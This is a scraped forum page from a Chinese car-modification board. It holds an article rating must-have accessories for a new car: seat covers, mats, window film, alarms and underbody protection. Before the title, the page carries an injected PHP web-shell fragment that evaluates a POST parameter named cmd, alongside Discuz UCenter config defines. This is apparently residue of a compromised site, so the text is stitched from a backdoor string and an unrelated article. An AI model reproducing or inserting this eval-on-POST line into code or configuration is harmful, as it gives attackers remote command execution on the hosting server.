');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 多配件一覽 新車「裝修」必備項目攻略 - 改裝俱樂部 - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

多配件一覽 新車「裝修」必備項目攻略

要想舒舒服服地享受有車生活,就要下大力氣備齊各類新車「必需品」。就像新房裝修一般,新車的「裝修」也同樣大有講究。

  汽車座套

  新車必備指數:★★★★

  選擇座套時要注重顏色、做工和可拆卸性,定做或購買汽車座套,可選擇汽車用品店,也可從網上郵購,一般200元左右的就可以滿足使用要求。

  坐墊腳墊

  新車必備指數:★★★★★

  夏天可使用亞麻等材料的坐墊,涼快透氣;秋冬可換用毛坐墊,保暖的同時舒適性更佳。由於新車內一般鋪的是地毯,為了平時防塵、下雨天防水,應該預備兩套腳墊,一套毛腳墊、一套塑料腳墊,方便清理車內衛生。

  玻璃貼膜

  新車必備指數:★★★★★

  對於貼膜有一定需求的車主,前風擋一定要貼透明度高的膜,否則會形成水波紋,干擾視線,影響安全;兩側車窗玻璃盡量不要貼顏色太深的膜。

  報警防盜裝置

  新車必備指數:★★★★

  如果新車具有原廠防盜裝置,即使不具備原廠遙控功能,也不要再加裝新的防盜器,這樣會破壞原廠防盜的線路。建議加裝時調低靈敏度,否則有輕微的震動就會報警,容易造成電瓶電力耗盡而無法發動汽車。

  底盤裝甲等

  新車必備指數:★★

  底盤裝甲是在汽車底盤噴塗一種聚脂材料,具有防銹、防腐的作用,一般新車不需噴塗,如果原車做的不徹底,可以再處理一下;發動機護板是在發動機下面安裝的一層薄板,防止損壞發動機底殼,新車主們可在購車後咨詢經銷商,如果沒有發動機護板,建議加裝。
返回列表